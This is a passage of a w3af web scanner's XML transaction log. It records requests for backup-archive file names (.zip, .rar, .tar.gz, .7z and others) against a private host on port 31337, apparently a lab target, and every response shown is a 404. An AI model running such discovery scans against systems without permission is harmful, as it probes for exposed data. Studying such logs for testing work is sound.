body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="229">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="230">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="231">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="232">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="233">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="234">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="236">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="237">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="238">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="239">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="240">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="241">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="242">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="243">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="244">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="245">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="246">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="247">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="248">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="250">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="251">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
